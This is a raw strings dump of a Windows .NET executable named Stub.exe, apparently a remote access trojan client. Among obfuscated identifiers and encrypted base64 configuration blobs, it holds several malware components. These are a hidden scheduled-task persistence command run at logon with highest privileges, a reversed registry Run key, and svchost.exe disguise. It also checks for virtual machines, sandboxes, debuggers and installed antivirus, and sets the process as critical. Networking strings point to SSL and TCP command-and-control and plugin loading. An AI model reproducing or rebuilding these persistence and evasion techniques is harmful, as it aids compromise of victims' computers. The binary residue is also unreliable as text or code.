!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
psIRXOMDAPA
ECKulPakPA
yGDrfsKnNJXdA
FNVYmRQpQpA
XJvaZUTnPFmGvA
jxjoMwaUelzA
RpzXWdMWlxnIemCB
PTleEUMwoIEB
LcusYXjGqlObVB
xDpATCMdLfbJdB
RdkYZJcTPAiB
yTpRcFjjeJokB
OiBeGaErUsvlB
uezUrKuYzAnB
VDpIjJUIxnHvqB
nlJEtJWgdLIXC
ADSMOdjYjDnC
KAytzuTSlIyC
GeuyhJrodTdmDD
MapNameToOID
get_FormatID
QwgtCAcgfhD
tXMJdZQcvBcZyD
CxOImGBNcbiJCE
YuDSpRKIvCE
LTHZILaqIIPE
MUdHSNvAPVAWfE
ONuQvzTvuDIvE
aFBmPBICvzE
RQWIRQKwDYF
eqbgEjvBeF
HiCXQfeikeF
PQtlDiHGuLigF
AOJKvHVZHHsF
HLRUZphHYXWXvF
kCUUubePJOGASG
qSvrXRdFocbUG
SWxYgmqpBIZwcG
WbNzGHxFhG
NYWVkaIKtWoG
JaXTEVCqQfsAH
qgZfMPsuxFH
sLYPMUHwXdtOVH
iVEhaxSltpWH
fPoCMnAHMfH
LLevHbjrPnjH
CXoEtzaulH
HIIaFFYwTroH
oYjeOqJAyWCxH
get_ASCII
EBgCXwalCbtAQI
esFNzwXkTchfI
JteNrmRxkgI
adMLqsPENrlI
ahquwGNWFDAVnI
kSHUaKtTIlaUoI
kexmNCFQpI
iZkHuOgewmuNwzI
JKDMFbLKDJSEJ
sXMSvSyQMEaOQJ
NxjiOUDurOWgrTJ
SoJBIdcipiSYCUJ
eOGXGcdRXWGlJ
NAOFVLvWYVlJ
gwOQCIxbKrJ
LlbqyIcFmrJ
HaLzsWtvfEbnOK
GkgFeYZxOK
LfpjcUzGuMKTK
YGSKpOorHWUK
BwFiiVqFKmOgK
MaRmfggsqmnK
YFEikhYudsroK
KFlpGFkyosK
IZUVPewCvpGxK
ZELbgLVsniBHxK
sSKbOypCBOFL
ElFlmZsQsVoQL
jmFkRExoteGTL
MaXdlxMgyeoL
GxQRfUqjKYvL
ZLIcfrKTxL
eQxcKxJYQTM
LnCESsAzrKGuxjcM
UdQiPtMuzzqM
kuuPPWxzrvysNuM
aIRHyDeWwM
GGbITvTAGDN
wsNTeIaQjVN
yYKvEuLmiikxN
System.IO
RlScbWhWflWO
gBLOXKYDRaMbO
BESZrCvdpBcO
iKwQOkPduioVdO
oNTqYZPnbskO
SPiNJkzdPbyMxrO
TzEGkezmpwhowO
gscJKcqNGWFP
mPyVfJSFmAAJP
YdSuHuKNQP
vQCabpxltGvlgoQQP
VennRyNMRXP
dMLHTjfywP
YeQFvPxtnDQ
VTeqBTXJwKQ
sdwERPAJlKFQLQ
baoCyWGxglWQ
ppCSfoHwsYWZQ
BhlGSSvbJzxeQ
EhvurrnxYUlQ
oaaLkozEDizsQ
JaYuMnLaDuQ
xqPPAbtzFiAvQ
ABDpPiWPRSxoGR
wIjXmoiqoXJR
oLtGaKUTXKR
hJYVDKVGykLrcuXR
OSJkjiPXpLaR
PHCmAKNfEpLcR
wbuLOIHPEiR
oCDcxTulDyQboR
OAKHaQjEGAS
hFnVYXdoHfsUDiS
pTmywWblDjS
VMRBtciozvkS
WyKGzNOHjBT
iSvNpoXmFT
NQfVlRahqiHT
jJxGfTXLaIT
qGYdqiDHiRTdgMT
MCJQkoFMWdT
YuNOacvUfuOJwgT
gDnRfAKjhT
EKTyWASVkT
ergOfcAhokT
NrMNrzShhKCU
neRxocWgIU
vfGfzeTFwfWU
YgHBHPgpqUesbU
MgjYFHlZrcrdU
IwbQiYiUeU
vtprhGmqmiU
QqjnBaNwXKHrU
IrgBGCGrGV
get_IV
set_IV
GenerateIV
MOaDIGcihQRpeUBRV
ooddtJdwSV
DxMaQuFSSeBTV
czPrPOskaanUVV
TqAhJxtKxVdbV
tmObFOWpGgV
djQbOWocgDgqV
IZFQybVPrFW
PnjNBrRoRklqLkIZJW
QwXFGIhpFatQPW
AFZfKUkzgW
jyCPnPKSTMWAlW
VjuybRbGlW
qUMVOMAOwpmIvxW
SZjsinqfuGEX
sZCYccnJbKX
DpgAdsWQYQDCQX
asfgRBbpOnkQX
rWUzirkhayPMaXX
ftNCCQTFrDEfXY
arUxpcAPaqPbY
nwiOImqCZNTzOcY
eDHeIkoIGlY
VVUJBWIglnY
NlapClzQFpbaZ
riAdQbeFTndZ
GicHnmZpaLpZ
kVoEPABAvZ
sZoCGKAluKzwZ
qWewDxxCEWdKzZ
value__
zVhnjhQKIXuWa
ATVlxeczoIZa
DjACqolnQXha
yrASXlreSexka
YStOQWuLvxsa
UgSKxgupDb
rUkCKArpxFb
gEewFKNrhePJb
BYXKOybrjrMb
jMHdkeHhomzRb
MLhyIwyvMPTb
pvbmOQkzKIOLXcb
mscorlib
dGqGiDyKZOfsmb
QzWHecvyfLOrb
fiISaQtBbZNvb
sbdZLiyYAWUtDc
WxftHukBtdSxJJc
ZCbMykYmbMc
TACCLLuwsNc
kZIELpJHrsQc
rjDbCJgAUdORc
kxbtepQCxmYPBUc
GNiDVQseEiNiUc
zfbLmJGhXc
GOfvNkxbdac
System.Collections.Generic
Microsoft.VisualBasic
KRoSNCtLtBjc
aLREeEFKmc
get_SendSync
gvMLqTlrvcQkovc
QNjLfCDobboMCd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
ttMsaQpbCTmXSgd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
LgQCeTlaQFrd
ZwRBaScnBe
ToirZGrgiKe
lLMxJQhWVtkspxQPe
rFyJrjITJjPe
gaEEkaptVIRe
ABKZOxluyTVe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
awRufwLwSDMxde
DeleteSubKeyTree
get_Message
OLccMIEmbgge
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
hdLjkWTSOJf
rUeyuzJCoYf
HWrUkvZllZnOtOof
YZMBjjgmof
rubfXQDmIxf
TIKeWuqJrDYAg
IJHQBirEEg
qiUQrSwouhg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
nQaLRNuyKBpg
YRwoGhcisg
CueKoHLUODwg
ljVTeSzxJYCh
CNktGTyxxmKh
jLcrktVyWwLh
irhmCNbqqYh
padIGMlTWLih
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
lnblzgytAwh
unQWPeFDMgXxh
HkzGeBWpzDi
QWYNgfxaaLi
klhlgBPrnVi
DKtLrcxVBRMxBai
aAdTsNPqDggIyi
jnRfXMQfZluiNyi
IHLeCFDlEj
DAvgHLlfXItj
DGVpnBygORUnbBk
ncScdeIqJhoDk
bgDuNXXjKOXUDFk
YGrAFQBIhHk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
UCbKtUvvIdugk
VOUCKjaEzook
BVDMmZQRAVzk
uhpFYVghubGlFl
KYDTGRjLkOrXJl
meezWhEIfsVxuNl
pVulvXtdJaAUKuIVl
EJwpoOLpKVl
RtlSetProcessIsCritical
NetworkCredential
hIJlsbARzFrmal
GbuEQFmRAnal
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
VXepNCyohXcl
NEiXjRkZrhl
kernel32.dll
user32.dll
ntdll.dll
pFaTyarCRrFttwl
oyXiFxVydAm
QlAUExPTAYMIm
DnnwoUzWlPm
HgFEOpIQqRm
LTJeNvbfJpZam
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
vIfiDgnQxFn
WwuqkgtaGn
ZczRfFootxDQMn
uvSCIhcUzYNn
WWIWbJUsSOn
jAFWRBibyIQn
ToBoolean
PRazsPZuFzan
nAILmcbmglen
SfxOyPVFMZin
X509Chain
AppDomain
get_CurrentDomain
qUoOfkApriPtmn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
agNEnMADKxHEo
VMKPfhbBco
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
DCfqjRAYUuako
AfngWpDzJp
CRtMCtWEfsJRp
cIEPavyLGcUnWUp
Microsoft.CSharp
LKNtnfiSoxCwp
pYCCoDVFIq
TAcogprHwaIDADgZq
LNWgKcBhaq
ltfhexRVjjlmq
System.Linq
BCRiBXVfblMTzCr
MeUhRFvdREdIr
aBZVfMFazOTr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
lRdarJjQir
bJsOAbUVBwir
uNAWzhDOkmr
csswcLTufXjnr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
ygROIzlmkzr
jErlcKlITFs
EqmAlLBJQxMs
RoIlPuKylSMQs
TQRqjBEEYs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
DjPlAdJxbges
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
MfyMbcuYALgs
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
eRjYclHUWQteRpPis
VfiHbZtMrfysks
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
BXjKpBXhCYenPos
tqSsSTvyzLYfos
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
LxCTIdhJws
UrqrndWxgCt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
mIAaHJHcgygt
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
nGaHvRzRLOzt
XvTNxDkWAPBu
eNkEnGBxbBUTu
CbRTJIgaWDcu
BjBemNLcoHEFzhu
sOSOmbjOccaepu
EyirfOomxu
VWmOiAkbxQjUv
aWUlhITAeYmstbv
dmkxfKhtqQev
IekCpJVhPwTjHjv
ofNNOMaSfOqv
cCdCScdWQCCw
BsvyrxuqxNmGw
JmbMpkOgOw
qvxHRaDFtOw
azlULlSIQuUw
WCTIpchMfKxhqCZw
KagabYCbUpZlw
SrtWPGqYgclunw
GetForegroundWindow
set_CreateNoWindow
rFuBaqmvLx
KzbgXudTyPx
WNtjrtTuYYYx
aGknbkhdGzLtjx
dWfCleCBBy
FyaIgwWXviohLy
mRaUhzDaZYy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
ZAcyUNYbbhzbvy
pxlNqlBtwbixy
pVvLUnlSyIMGFzy
QozivArgXMAz
ZQHoQzhrZJz
YMRjKERotSz
fMTnhPARIuGyhz
HENRKDRmwMGiwz
iAERiivFxFzz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
6iyrRIFPE/681TkbcQtCmvAWACSQEXUtWz3uyCQtNvc+ZnC+1rwEyWUMyis8BhZpdckOFAUDSXi4IyaXZEXrpw==
zNLkPyR4n6O7Mk1EXVU5/XI8e+y7+mJK3idWvjgEUknoowsq1CsPW38QXMW9oYyj23MjkDnglp8FOWQ24dyNAg==
8P33OdIZ11n8aPW8s29dHCuH/z1R7I/pPMxPyWXLIrT7ic1cFCUjOnH9X+El7s23EYvBywrYkULHpxY5EBCn/w==
0wCyulE6Y3/A3Uk/BV2GIoL5NT8luq9XRXUIEEoD4Om/Wl5+lPJwp+Cb9UgYSea6iie3+28Azpg0+hON/PfBfw==
%Temp%
svchost.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0